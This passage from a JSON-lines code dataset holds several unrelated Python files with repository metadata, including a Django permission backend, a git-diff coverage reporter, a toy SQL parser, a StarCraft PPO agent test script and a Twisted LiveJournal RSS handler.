perm_cache.union({\n \"{label}.any.{codename}\".format(label=label, codename=codename)\n for label, slug, codename in group_perms\n })\n perm_cache = perm_cache.union({\n \"{label}.archive.{slug}.{codename}\".format(label=label, slug=slug, codename=codename)\n for label, slug, codename in group_perms\n })\n perms = Permission.objects.filter(\n group__user=user_obj,\n content_type__app_label='archive',\n )\n perms = perms.values_list('content_type__app_label', 'codename').order_by()\n perm_cache = perm_cache.union(self.implied_per_archive_permissions(perms))\n user_obj._group_perm_cache = perm_cache\n return perm_cache\n\n def implied_per_archive_permissions(self, values):\n return {\n \"{label}.archive.{slug}.{codename}\".format(label=label, codename=codename, slug=archive.slug)\n for label, codename in values\n for archive in Archive.objects.all()\n } | {\n \"{label}.any.{codename}\".format(label=label, codename=codename)\n for label, codename in values\n }\n\n def get_user_permissions(self, user_obj, obj=None):\n perm_cache = super().get_user_permissions(user_obj, obj)\n 
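# the per-archive grants fetched below are expanded into both \"{label}.any.{codename}\" and \"{label}.archive.{slug}.{codename}\" permission strings, mirroring get_group_permissions above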
perms = Permission.objects.filter(\n archiveuserpermission__user=user_obj,\n content_type__app_label='archive',\n )\n perms = perms.values_list('content_type__app_label', 'archiveuserpermission__archive__slug', 'codename').order_by()\n perm_cache = perm_cache.union({\n \"{label}.any.{codename}\".format(label=label, codename=codename)\n for label, slug, codename in perms\n })\n perm_cache = perm_cache.union({\n \"{label}.archive.{slug}.{codename}\".format(label=label, slug=slug, codename=codename)\n for label, slug, codename in perms\n })\n if user_obj.is_superuser:\n perms = Permission.objects.filter(\n content_type__app_label='archive',\n )\n else:\n perms = Permission.objects.filter(\n user=user_obj,\n content_type__app_label='archive',\n )\n perms = perms.values_list('content_type__app_label', 'codename').order_by()\n perm_cache = perm_cache.union(self.implied_per_archive_permissions(perms))\n\n user_obj._user_perm_cache = perm_cache\n return perm_cache\n\n def has_perm(self, user_obj, perm, obj=None):\n return super().has_perm(user_obj, perm, obj)\n","repo_name":"workjonathan/kronofoto","sub_path":"kronofoto/archive/auth/backends.py","file_name":"backends.py","file_ext":"py","file_size_in_byte":3288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33381489748","text":"from __future__ import print_function\n\nimport argparse\nfrom collections import Counter\nimport os\nimport re\nimport subprocess\n\nfile_re = re.compile(r'diff --git a/(\\S+)')\ndiff_region_re = re.compile(r'@@\\s[-]\\S+\\s[+](\\S+)\\s@@')\nsource_line_re = re.compile(r'
\s*<p id=\"n(\d+)\" class=\"(\w{3}(\s\w{3})?)\"')\ntitle_re = re.compile(r'\s*<title>
Coverage for [^:]+:\s+(\d+%)<\/title>')\nsummary_end_re = re.compile(r'\s+<\/table>')\n\n__version__ = \"0.7\"\n\n\nclass DiffCollectionFailed(Exception):\n pass\n\n\nclass SourceLine(object):\n\n def __init__(self, line_number, is_context=True, code=''):\n self.line_number = line_number\n self.is_context = is_context\n self.code = code\n self.status = '???'\n\n def __eq__(self, other):\n return (self.line_number == other.line_number and\n self.is_context == other.is_context)\n\n def __repr__(self):\n return \"SourceLine(line_number=%d, is_context=%s)\" % (self.line_number,\n self.is_context)\n\n\nclass SourceModule(object):\n\n def __init__(self, filename, lines):\n self.filename = filename\n self.lines = lines\n self.line_num_map = {l.line_number: l for l in lines}\n self.cover_file = (filename.replace('/', '_').replace('.', '_') +\n \".html\")\n self.have_report = False\n self.coverage = '??%'\n\n def update_line_status(self, line_number, status):\n if line_number in self.line_num_map:\n line = self.line_num_map[line_number]\n if status.startswith('pln'):\n line.status = ' '\n else:\n line.status = status[4:7]\n\n def report(self):\n output = self.filename\n if not self.have_report:\n return \"%s (No coverage data)\\n\" % output\n if not self.lines or all(l.is_context for l in self.lines):\n return \"%s (No added/changed lines)\\n\" % output\n stats = Counter([l.status for l in self.lines if not l.is_context])\n output += \" (run={}, mis={}, par={}, ign={}) {}\\n\".format(\n stats['run'], stats['mis'], stats['par'], stats[' '],\n self.coverage)\n last_line = None\n for line in self.lines:\n if last_line and line.line_number != (last_line + 1):\n output += \"\\n\"\n output += \"{:5d} {} {} {}\\n\".format(\n line.line_number, line.status,\n ' ' if line.is_context else '+', line.code)\n last_line = line.line_number\n return output\n\n\ndef check_coverage_status(coverage_info, module):\n for coverage_line in coverage_info:\n m = title_re.match(coverage_line)\n if m:\n module.coverage = m.group(1)\n continue\n if summary_end_re.match(coverage_line):\n return\n m = source_line_re.match(coverage_line)\n if m:\n line_num = int(m.group(1))\n status = m.group(2)\n module.update_line_status(line_num, status)\n\n\ndef check_coverage_file(root, module):\n \"\"\"Check the lines in coverage file and report coverage status.\"\"\"\n report_file = os.path.join(root, 'cover', module.cover_file)\n if not os.path.isfile(report_file):\n return # No coverage data for file\n with open(report_file) as coverage_info:\n coverage_lines = coverage_info.readlines()\n check_coverage_status(coverage_lines, module)\n module.have_report = True\n\n\ndef collect_diff_lines(diff_region, start, last):\n \"\"\"Find added and context lines in a diff region.\n\n Note: If the diff region is at the start or end of the file, there\n may not be context lines.\n \"\"\"\n lines = []\n line_num = start\n while line_num <= last:\n line = next(diff_region)\n if line.startswith('-'):\n continue\n lines.append(SourceLine(line_num, is_context=line.startswith(' '),\n code=line[1:]))\n line_num += 1\n return lines\n\n\ndef parse_diffs(diff_output):\n \"\"\"Collect the file and ranges of diffs added, if any.\"\"\"\n added_lines = []\n source_file = ''\n diff_lines = iter(diff_output.splitlines())\n for line in diff_lines:\n m = file_re.match(line)\n if m:\n source_file = m.group(1)\n continue\n m = diff_region_re.match(line)\n if m:\n start, comma, num = m.group(1).partition(',')\n start = int(start)\n if num:\n last = start + int(num) - 1\n 
else:\n last = start\n added_lines += collect_diff_lines(diff_lines, start, last)\n return (source_file, added_lines)\n\n\ndef collect_diffs_for_files(root, versions, source_files, context_lines):\n \"\"\"Generator to obtain the diffs for files.\"\"\"\n os.chdir(root)\n for filename in source_files:\n command = ['git', 'diff', '-U%d' % context_lines,\n '-w', versions, '--', filename]\n p = subprocess.Popen(command,\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n diff_lines, err = p.communicate()\n if err:\n raise DiffCollectionFailed(\n \"Unable to collect diffs for file %s/%s: %s\" %\n (root, filename, err))\n yield diff_lines\n\n\ndef collect_diff_files(root, versions):\n \"\"\"Generator to obtain all the diff files.\"\"\"\n command = ['git', 'diff', '--name-only', versions]\n os.chdir(root)\n p = subprocess.Popen(command,\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out, err = p.communicate()\n if err:\n raise DiffCollectionFailed(\"Unable to find diff files to examine \"\n \"in %s: %s\" % (root, err))\n for filename in out.splitlines():\n if not os.path.basename(filename).startswith('.'):\n yield filename\n\n\ndef validate(parser, provided_args=None):\n args = parser.parse_args(provided_args)\n args.root = os.path.abspath(args.root)\n if not os.path.isdir(args.root):\n parser.error(\"The repo-dir must be a directory pointing to the top \"\n \"of the Git repo\")\n if not os.path.isdir(os.path.join(args.root, 'cover')):\n parser.error(\"Missing cover directory for project\")\n if args.commits == 'working':\n args.commits = 'HEAD'\n elif args.commits == 'committed':\n args.commits = 'HEAD^..HEAD'\n return args\n\n\ndef main():\n args = validate(setup_parser())\n files = collect_diff_files(args.root, args.commits)\n diff_files = collect_diffs_for_files(args.root, args.commits, files,\n args.context)\n for diffs in diff_files:\n source_file, lines = parse_diffs(diffs)\n module = SourceModule(source_file, lines)\n check_coverage_file(args.root, module)\n print(module.report())\n\n\ndef setup_parser():\n parser = argparse.ArgumentParser(\n description='Reports coverage for a commit in repo.')\n parser.add_argument(\n '-c', '--context', action='store', type=int, default=3,\n help='Number of context lines around diff regions. Default=3.')\n parser.add_argument(\n '-w', '--which', action='store', default=\"working\", dest='commits',\n help=\"Which commit(s) to compare. Use 'working', 'commit', or \"\n \"custom commit specification. Latest should be same as cover run. 
\"\n \"Default='working'.\")\n parser.add_argument(dest='root', metavar='repo-dir',\n help=\"Root of Git repo\")\n return parser\n","repo_name":"pmichali/commit-coverage","sub_path":"commit_coverage/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7578,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"21931316268","text":"\"\"\" get rates module \"\"\"\n\nfrom concurrent.futures import ThreadPoolExecutor\nfrom datetime import date\nimport threading\n\nimport requests\n\nfrom rates_demo.business_days import business_days\nimport rates_demo.rates_orchestrator as ro\n\ndef get_rates(base_url: str) -> list[str]:\n \"\"\" get rates \"\"\"\n\n start_date = date(2021, 1, 1)\n end_date = date(2021, 1, 31)\n rates: list[str] = []\n\n for business_day in business_days(start_date, end_date):\n rates_url = \"\".join([base_url, \"/api/\",\n business_day.strftime(\"%Y-%m-%d\"),\n \"?base=USD&symbols=EUR\"])\n\n response = requests.request(\"GET\", rates_url)\n rates.append(response.text)\n\n return rates\n\n\ndef get_rate_task(base_url: str, business_day: date) -> None:\n \"\"\" get rate for a single day from the rest api \"\"\"\n\n rates_url = \"\".join([base_url, \"/api/\",\n business_day.strftime(\"%Y-%m-%d\"),\n \"?base=USD&symbols=EUR\"])\n\n ro.process_rates_queue.put(requests.request(\"GET\", rates_url).text)\n\n\ndef get_rates_threaded(base_url: str) -> None:\n \"\"\" get rates using multiple threads \"\"\"\n\n start_date = date(2021, 1, 1)\n end_date = date(2021, 1, 31)\n threads: list[threading.Thread] = []\n\n for business_day in business_days(start_date, end_date):\n a_thread = threading.Thread(\n target=get_rate_task, args=(base_url, business_day))\n a_thread.start()\n threads.append(a_thread)\n\n for a_thread in threads:\n a_thread.join()\n\n ro.get_rates_done.set()\n\n\n# def get_rates_threadpool(base_url: str) -> list[str]:\n# \"\"\" get rates using multiple threads \"\"\"\n\n# start_date = date(2021, 1, 1)\n# end_date = date(2021, 1, 31)\n\n# with ThreadPoolExecutor() as executor:\n\n# return list(executor.map(\n# lambda params: get_rate_task(*params),\n# [ (base_url, business_day) for business_day\n# in business_days(start_date, end_date)]\n# ))\n\n\n","repo_name":"t4d-classes/advanced-python_05102021","sub_path":"python_demos/rates_demo/get_rates.py","file_name":"get_rates.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73826630951","text":"import ipaddress\n\nclass Validator:\n\n ALLOWED_STATES = [\n 'NY',\n 'CA',\n 'AZ',\n 'TX',\n 'OH'\n ]\n\n ALLOWED_ESTIMATION_TYPES = [\n 'normal',\n 'premium'\n ]\n\n MANDATORY_PARAMETERS = [\n 'km',\n 'type',\n 'base_amount',\n 'state',\n ]\n\n NUMBER_PARAMETERS = [\n 'km',\n 'base_amount'\n ]\n\n def validate(self, params, ip):\n self.validate_ip(ip)\n self.validate_params_integrity(params)\n self.validate_state(params['state'])\n self.validate_type(params['type'])\n self.validate_numbers(params)\n\n def validate_params_integrity(self, params):\n params_sent = list(params.keys())\n for param in self.MANDATORY_PARAMETERS:\n if param not in params_sent:\n raise Exception(\"param \"+param+\" is a mandatory\")\n if params[param] == '':\n raise Exception(\"param \"+param+\" shouldn't be empty\")\n\n def validate_state(self, state:str):\n if state.upper() not in self.ALLOWED_STATES:\n raise Exception('unsupported state')\n\n def validate_type(self, 
type:str):\n if type.lower() not in self.ALLOWED_ESTIMATION_TYPES:\n raise Exception('unsupported type')\n\n def validate_ip(self, ip):\n try:\n ipaddress.ip_address(ip)\n except ValueError:\n raise Exception(\"ip is not valid\")\n\n def validate_numbers(self, params):\n for param in self.NUMBER_PARAMETERS:\n if not params[param].isnumeric():\n try:\n float(params[param])\n except ValueError:\n raise Exception(\"param \"+param+\" must be numeric\")\n\n","repo_name":"dsmunoz/total-calculator","sub_path":"services/validator.py","file_name":"validator.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73830448874","text":"from django.urls import path, include\n\nfrom wind_simulation_model.views import (\n wind_station_simulation_main, wind_station_simulation_now, wind_station_simulation_forecast,\n calculate_solar_radiation, get_forecast_data, turbines, turbine_in_detail, add_turbine,\n edit_turbine, edit_turbine_field, delete_turbine_table, add_turbine_field, get_all_forecast_data\n)\n\n\nurlpatterns = [\n path('solar_radiation', calculate_solar_radiation, name='calculate_solar_radiation'),\n\n path('wind_simulation', wind_station_simulation_main, name='wind_station_simulation_main'),\n path('wind_simulation/now', wind_station_simulation_now, name='wind_station_simulation_now'),\n path('wind_simulation/forecast', wind_station_simulation_forecast, name='wind_station_simulation_forecast'),\n\n path('wind_simulation/list_of_turbines', turbines, name='list_of_turbines'),\n path('wind_simulation/list_of_turbines/<int:pk>', turbine_in_detail, name='turbine_in_detail'),\n\n path('wind_simulation/add_turbine', add_turbine, name='add_turbine'),\n path('wind_simulation/list_of_turbines/<int:pk>/add', add_turbine_field, name='add_turbine_field'),\n\n path('wind_simulation/list_of_turbines/<int:pk>/edit', edit_turbine, name='edit_turbine'),\n path('wind_simulation/list_of_turbines/<int:pk>/edit/<int:field_pk>', edit_turbine_field, name='edit_turbine_field'),\n\n path('wind_simulation/list_of_turbines/<int:pk>/delete', delete_turbine_table, name='delete_turbine_table'),\n\n path('get_forecast_data', get_forecast_data, name='get_forecast_data'),\n path('get_all_forecast_data', get_all_forecast_data, name='get_all_forecast_data'),\n]\n","repo_name":"Oleg-tech/solar-system-monitoring-service","sub_path":"house_monitoring_system/wind_simulation_model/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12732656918","text":"import re\n\n\nclass Keyword:\n def __init__(self, value: str):\n self.value = value\n\n def __eq__(self, other):\n if not isinstance(other, Keyword):\n return False\n\n return self.value == other.value\n\n def __repr__(self):\n return f'Keyword(value=\"{self.value}\")'\n\n\nclass Literal:\n def __init__(self, value: str):\n self.value = value\n\n def __eq__(self, other):\n if not isinstance(other, Literal):\n return False\n\n return self.value == other.value\n\n def __repr__(self):\n return f'Literal(value=\"{self.value}\")'\n\n\nclass Select:\n def __init__(\n self,\n select_list: list[str],\n select_from: list[str],\n join: list[tuple[str, str, tuple]],\n where: tuple\n ):\n self.select_list = select_list\n self.select_from = select_from\n self.join = join\n self.where = where\n\n def __eq__(self, other):\n if not isinstance(other, Select):\n return False\n\n return (\n self.select_list == other.select_list\n and 
self.select_from == other.select_from\n and self.join == other.join\n and self.where == other.where\n )\n\n def __repr__(self):\n return f'Select(select_list={self.select_list}, select_from={self.select_from}, join={self.join}, where={self.where})'\n\n\nclass InvalidTokenError(Exception):\n pass\n\n\nTokens = list[Keyword | Literal | Select]\n\n\ndef parse_sql(s: str) -> Tokens:\n position = skip_white_spaces(s, 0)\n select, position = read_query(s, position)\n return [select]\n\n\ndef skip_white_spaces(s: str, position: int) -> int:\n while position < len(s) and s[position] in (' ', '\\t', '\\n', '\\r'):\n position += 1\n return position\n\n\ndef read_query(s: str, position: int) -> tuple[Select, int]:\n _, position = read_keyword('select', s, position)\n select_list, position = read_list(s, position)\n _, position = read_keyword('from', s, position)\n select_from, position = read_list(s, position)\n join, position = read_joins(s, position)\n where, position = read_where(s, position)\n return Select(select_list=select_list, select_from=select_from, join=join, where=where), position\n\n\ndef read_list(s: str, position: int) -> tuple[list, int]:\n items = []\n while position < len(s):\n value, position = read_until_separator(s, position)\n items.append(value)\n position = skip_white_spaces(s, position)\n if position >= len(s) or s[position] != ',':\n break\n position += 1\n position = skip_white_spaces(s, position)\n\n position = skip_white_spaces(s, position)\n return items, position\n\n\ndef read_until(values: list[str], s: str, position: int) -> tuple[str, int]:\n start = position\n while position < len(s):\n found_value = any(s[position:].lower().startswith(value) for value in values)\n if found_value:\n break\n\n position += 1\n\n return s[start:position], position\n\n\ndef read_until_white_space(s: str, position: int) -> tuple[str, int]:\n value, position = read_until([' ', '\\t', '\\n', '\\r'], s, position)\n position = skip_white_spaces(s, position)\n return value, position\n\n\ndef read_until_white_space_or_bracket(s: str, position: int) -> tuple[str, int]:\n value, position = read_until([' ', '\\t', '\\n', '\\r', ')', '('], s, position)\n position = skip_white_spaces(s, position)\n return value, position\n\n\ndef read_until_separator(s: str, position: int) -> tuple[str, int]:\n return read_until([',', ' ', '\\t', '\\n', '\\r'], s, position)\n\n\ndef read_keyword(keyword: str, s: str, position: int) -> tuple[Keyword, int]:\n t = s[position:].lower()\n if t.startswith(keyword):\n position = skip_white_spaces(s, position + len(keyword))\n return Keyword(keyword), position\n\n raise InvalidTokenError(f'Invalid token at position {position}: expected keyword \"{keyword}\"')\n\n\ndef read_keywords(keywords: list[str], s: str, position: int) -> tuple[Keyword, int]:\n t = s[position:].lower()\n\n for keyword in keywords:\n if t.startswith(keyword):\n position = skip_white_spaces(s, position + len(keyword))\n return Keyword(keyword), position\n\n raise InvalidTokenError(f'Invalid token at position {position}: expected keywords \"{keywords}\"')\n\n\ndef read_literal(s: str, position: int) -> tuple[Literal, int]:\n start = position\n while position < len(s) and s[position] not in (' ', '\\t', '\\n', '\\r'):\n position += 1\n\n return Literal(s[start:position]), position\n\n\ndef read_joins(s: str, position: int) -> tuple[list, int]:\n joins = []\n while position < len(s):\n position = skip_white_spaces(s, position)\n if re.match(r'^left\\s+outer\\s+join\\s+', s[position:], re.IGNORECASE) is 
not None:\n join, position = read_left_outer_join(s, position)\n elif re.match(r'^inner\\s+join\\s+', s[position:], re.IGNORECASE) is not None:\n join, position = read_inner_join(s, position)\n elif re.match(r'^join\\s+', s[position:], re.IGNORECASE) is not None:\n join, position = read_join(s, position)\n else:\n break\n\n joins.extend(join)\n\n position = skip_white_spaces(s, position)\n return joins, position\n\n\ndef read_left_outer_join(s: str, position: int) -> tuple[list, int]:\n _, position = read_keyword('left', s, position)\n _, position = read_keyword('outer', s, position)\n _, position = read_keyword('join', s, position)\n table, position = read_until_white_space(s, position)\n _, position = read_keyword('on', s, position)\n conditions, position = read_conditions(s, position)\n return [('left outer join', table, conditions)], position\n\n\ndef read_inner_join(s: str, position: int) -> tuple[list, int]:\n _, position = read_keyword('inner', s, position)\n _, position = read_keyword('join', s, position)\n value, position = read_until_white_space(s, position)\n _, position = read_keyword('on', s, position)\n conditions, position = read_conditions(s, position)\n return [('inner join', value, conditions)], position\n\n\ndef read_join(s: str, position: int) -> tuple[list, int]:\n _, position = read_keyword('join', s, position)\n value, position = read_until_white_space(s, position)\n _, position = read_keyword('on', s, position)\n conditions, position = read_conditions(s, position)\n return [('join', value, conditions)], position\n\n\ndef read_where(s: str, position: int) -> tuple[tuple | None, int]:\n if not s[position:].lower().startswith('where'):\n return None, position\n\n _, position = read_keyword('where', s, position)\n conditions, position = read_conditions(s, position)\n\n return conditions, position\n\n\ndef read_conditions(s: str, position: int) -> tuple[tuple, int]:\n operands = []\n operators = []\n while position < len(s):\n if s[position] == '(':\n operators.append('(')\n position = skip_white_spaces(s, position + 1)\n\n left, position = read_until_white_space(s, position)\n operator, position = read_until_white_space(s, position)\n right, position = read_until_white_space_or_bracket(s, position)\n\n condition = (left, operator, right)\n operands.append(condition)\n\n if position < len(s) and s[position] == ')':\n position = skip_white_spaces(s, position + 1)\n while len(operators) > 0 and operators[-1] != '(':\n boolean_operator = operators.pop()\n right_condition = operands.pop()\n left_condition = operands.pop()\n operands.append((boolean_operator, left_condition, right_condition))\n operators.pop()\n\n if re.match(r'^(and|or)', s[position:], re.IGNORECASE) is None:\n break\n\n keyword, position = read_keywords(['and', 'or'], s, position)\n boolean_operator = keyword.value\n\n while len(operators) > 0 and operators[-1] == 'and' and boolean_operator == 'or':\n last_boolean_operator = operators.pop()\n\n if last_boolean_operator == '(':\n break\n\n right_condition = operands.pop()\n left_condition = operands.pop()\n operands.append((last_boolean_operator, left_condition, right_condition))\n\n operators.append(boolean_operator)\n\n while len(operators) > 0:\n boolean_operator = operators.pop()\n right_condition = operands.pop()\n left_condition = operands.pop()\n operands.append((boolean_operator, left_condition, right_condition))\n\n conditions = operands.pop()\n\n position = skip_white_spaces(s, position)\n return conditions, 
position\n","repo_name":"inikolaev/toy-database-engine","sub_path":"sql_parser.py","file_name":"sql_parser.py","file_ext":"py","file_size_in_byte":8715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35607249368","text":"from saida_gym.starcraft.vultureVsZealot import VultureVsZealot\r\n## import the VultureVsZealot gym environment\r\n\r\nfrom collections import deque\r\nimport numpy as np\r\nimport random\r\nimport os\r\nimport math\r\nimport pickle\r\nimport time\r\n\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport torch.optim as optim\r\nfrom torch.distributions import Categorical ## for sampling from action distributions\r\nfrom tensorboardX import SummaryWriter\r\n\r\nclass Actor(nn.Module):\r\n def __init__(self, state_size, action_size):\r\n super(Actor, self).__init__()\r\n self.fc1 = nn.Linear(state_size,128) ## input state\r\n self.fc2 = nn.Linear(128,512)\r\n self.fc3 = nn.Linear(512,128)\r\n self.fc4 = nn.Linear(128,action_size) ## output each action\r\n\r\n def forward(self, x, soft_dim):\r\n x = torch.tanh(self.fc1(x))\r\n x = torch.tanh(self.fc2(x))\r\n x = torch.tanh(self.fc3(x))\r\n \r\n prob_each_actions = F.softmax(self.fc4(x),dim=soft_dim) ## the network estimates a probability for each action\r\n\r\n return prob_each_actions\r\n\r\ndef scale_velocity(v):\r\n return v / 6.4\r\n\r\ndef scale_coordinate(pos):\r\n if pos > 0:\r\n return 1 if pos > 320 else int(pos / 16) / 20\r\n else:\r\n return -1 if pos < -320 else int(pos / 16) / 20\r\n\r\ndef scale_angle(angle):\r\n return (angle - math.pi) / math.pi\r\n\r\ndef scale_cooldown(cooldown):\r\n return (cooldown + 1) / 15\r\n\r\ndef scale_vul_hp(hp):\r\n return hp / 80\r\n\r\ndef scale_zeal_hp(hp):\r\n return hp / 160\r\n\r\ndef scale_bool(boolean):\r\n return 1 if boolean else 0\r\n\r\ndef rearrange_State(observation, state_size, env):\r\n state_arr = deque(maxlen=state_size)\r\n\r\n my_x = 0\r\n my_y = 0\r\n if observation.my_unit:\r\n for idx, me in enumerate(observation.my_unit): ## 9\r\n my_x = me.pos_x\r\n my_y = me.pos_y\r\n state_arr.append(math.atan2(me.velocity_y, me.velocity_x) / math.pi)\r\n state_arr.append(scale_velocity(math.sqrt((me.velocity_x) ** 2 + (me.velocity_y) ** 2)))\r\n state_arr.append(scale_cooldown(me.cooldown))\r\n state_arr.append(scale_vul_hp(me.hp))\r\n state_arr.append(scale_angle(me.angle))\r\n state_arr.append(scale_bool(me.accelerating))\r\n state_arr.append(scale_bool(me.braking))\r\n state_arr.append(scale_bool(me.attacking))\r\n state_arr.append(scale_bool(me.is_attack_frame))\r\n for i, terrain in enumerate(me.pos_info): ##12\r\n state_arr.append(terrain.nearest_obstacle_dist / 320)\r\n else:\r\n for _ in range(state_size - 11):\r\n state_arr.append(0)\r\n\r\n if observation.en_unit:\r\n for idx, enemy in enumerate(observation.en_unit): ## 11\r\n state_arr.append(math.atan2(enemy.pos_y - my_y, enemy.pos_x - my_x) / math.pi)\r\n state_arr.append(scale_coordinate(math.sqrt((enemy.pos_x - my_x) ** 2 + (enemy.pos_y - my_y) ** 2)))\r\n state_arr.append(math.atan2(enemy.velocity_y, enemy.velocity_x) / math.pi)\r\n state_arr.append(scale_velocity(math.sqrt((enemy.velocity_x) ** 2 + (enemy.velocity_y) ** 2)))\r\n state_arr.append(scale_cooldown(enemy.cooldown))\r\n state_arr.append(scale_zeal_hp(enemy.hp + enemy.shield))\r\n state_arr.append(scale_angle(enemy.angle))\r\n state_arr.append(scale_bool(enemy.accelerating))\r\n state_arr.append(scale_bool(enemy.braking))\r\n state_arr.append(scale_bool(enemy.attacking))\r\n 
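# is_attack_frame below completes the per-enemy feature block (11 values, matching the range(11) zero-fill in the else branch)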
state_arr.append(scale_bool(enemy.is_attack_frame))\r\n else:\r\n for _ in range(11):\r\n state_arr.append(0)\r\n \r\n\r\n return state_arr\r\n\r\ndef reward_reshape(state, next_state, reward, done):\r\n\r\n KILL_REWARD = 10\r\n DEAD_REWARD = -10\r\n DAMAGED_REWARD = -4\r\n HIT_REWARD = 2\r\n\r\n if done:\r\n if reward > 0: ## a reward of 1 from the env means the Zealot was killed\r\n reward = KILL_REWARD\r\n if next_state[3] == 1.0 and next_state[-6] == 0: ## extra bonus reward for a perfect clear\r\n reward+=5\r\n \r\n return reward\r\n # kill case\r\n else: ## the game ended with a -1 value, i.e. the Vulture died\r\n reward = DEAD_REWARD\r\n return reward\r\n else: ## the game is not over yet\r\n my_pre_hp = state[3]\r\n my_cur_hp = next_state[3]\r\n \r\n en_pre_hp = state[-6]\r\n en_cur_hp = next_state[-6]\r\n \r\n if my_pre_hp - my_cur_hp > 0: ## the Vulture got hit\r\n reward += DAMAGED_REWARD\r\n if en_pre_hp - en_cur_hp > 0: ## we hit the Zealot\r\n reward += HIT_REWARD\r\n \r\n ## getting hit and landing a hit can happen in the same step, so each case is its own if statement and the rewards accumulate with +=\r\n \r\n return reward\r\n\r\ndef main():\r\n \r\n load = True\r\n episode = 0 ## 21710: 91.1%, 21610: 91%, 21600: 90%; three of the tested models scored 90% or higher.\r\n ## depending on the environment's initial state and the episode conditions, the perfect-score rate ranges from 86% to 91%. \r\n \r\n env = VultureVsZealot(version=0, frames_per_step=12, action_type=0, move_angle=20, move_dist=3, verbose=0, no_gui=False\r\n ,auto_kill=False)\r\n print_interval = 10\r\n \r\n learning_rate=0.00003\r\n torch.manual_seed(500)\r\n \r\n state_size = 38\r\n \r\n action_size= 19\r\n \r\n\r\n actor = Actor(state_size, action_size)\r\n \r\n \r\n if load: ## change the path to your model directory + model file name; models were originally distinguished by episode number.\r\n actor.load_state_dict(torch.load(os.path.join('C:/SAIDA_RL/python/saida_agent_example/vultureZealot/save_ppo3_clear/','clear_ppo_actor_'+str(episode)+'.pkl')))\r\n \r\n actor_optimizer = optim.Adam(actor.parameters(), lr=learning_rate)\r\n \r\n episode = 0\r\n clear_cnt=0\r\n for n_iter in range(1000):\r\n step = 0\r\n \r\n state = env.reset()\r\n \r\n state = rearrange_State(state, state_size, env)\r\n episode+=1\r\n temp_score = 0.0\r\n while True:\r\n \r\n prob_each_actions = actor(torch.Tensor(state), soft_dim=0)\r\n \r\n distribution = Categorical(prob_each_actions)\r\n \r\n action = distribution.sample().item() \r\n \r\n next_state, reward, done, info = env.step([action])\r\n next_state = rearrange_State(next_state, state_size, env)\r\n \r\n reward = reward_reshape(state, next_state, reward, done) \r\n \r\n mask = 0 if done else 1 \r\n \r\n state = next_state\r\n \r\n temp_score += reward \r\n \r\n if next_state[3] == 1.0 and next_state[-6] == 0:\r\n clear_cnt+=1\r\n print(\"clear: \",next_state[3],next_state[-6],\"clear_score: \",temp_score, \"clear_cnt: \", clear_cnt,\" / \", n_iter+1)\r\n \r\n if done: \r\n print(\"step: \", step, \"per_episode_score: \",temp_score)\r\n \r\n break\r\n\r\n print(\"clear count: \",clear_cnt,\" percent: \",(clear_cnt/n_iter)) \r\n env.close()\r\n \r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"betastarcraft/Problem_1","sub_path":"01_Vulture_vs_Zealot/Perfect_Performance_test/vz_PPO_test.py","file_name":"vz_PPO_test.py","file_ext":"py","file_size_in_byte":7387,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"26276723435","text":"total = 0\n\ndef get_mul(num):\n sum = 1\n while num > 1:\n sum *= num\n num -= 1\n return sum\ndef get_num(s, num, d, sum):\n if d <= 0:\n return\n if sum <= 0:\n return\n if num * num > sum:\n get_num(s, num - 1, d, sum)\n if num * num == 
sum:\n global total\n total += 2**(27-d+1) * get_mul(len(set(s+str(num))))\n # print(24-d+1, len(set(s+str(num))) - 1)\n print(s + str(num) + '0' * (d - 1) + ' ' + str(2**(24-d+1) * get_mul(len(set(s+str(num))) - 1)))\n while num > 0:\n if num * num < sum:\n # print(s + str(num), num - 1, d - 1, sum - num * num)\n if (num)**2 <= sum - num * num:\n get_num(s + str(num), num, d - 1, sum - num * num)\n else:\n get_num(s + str(num), num - 1, d - 1, sum - num * num)\n num -= 1\nget_num(' ', 8, 24, 79)\nprint(total)","repo_name":"xiaoxiongfeng/lattice","sub_path":"zn.py","file_name":"zn.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14774213674","text":"from collections import OrderedDict\n\nd = OrderedDict()\nd['foo'] = 1\nd['bar'] = 2\nd['span'] = 4\nprint(d)\nfor key in d:\n print(key, d[key])\n\nimport json\n\nj = json.dumps(d)\nprint(j)\n\nj = json.loads(j)\nprint(j)\n","repo_name":"ayumi64/Python_Cookbook_Learn","sub_path":"Section01 数据结构和算法/s1.7_字典排序.py","file_name":"s1.7_字典排序.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17497666515","text":"from __future__ import nested_scopes\n\nfrom twisted.web import resource as resourcelib\nfrom twisted.web import client, microdom, domhelpers, server\n\nurlTemplate = 'http://www.livejournal.com/users/%s/rss'\n\nclass LJSyndicatingResource(resourcelib.Resource):\n\n def render_GET(self, request):\n url = urlTemplate % request.args['user'][0]\n client.getPage(url).addCallback(\n microdom.parseString).addCallback(\n lambda t: domhelpers.findNodesNamed(t, 'item')).addCallback(\n lambda itms: zip([domhelpers.findNodesNamed(x, 'title')[0]\n for x in itms],\n [domhelpers.findNodesNamed(x, 'link')[0]\n for x in itms]\n )).addCallback(\n lambda itms: '
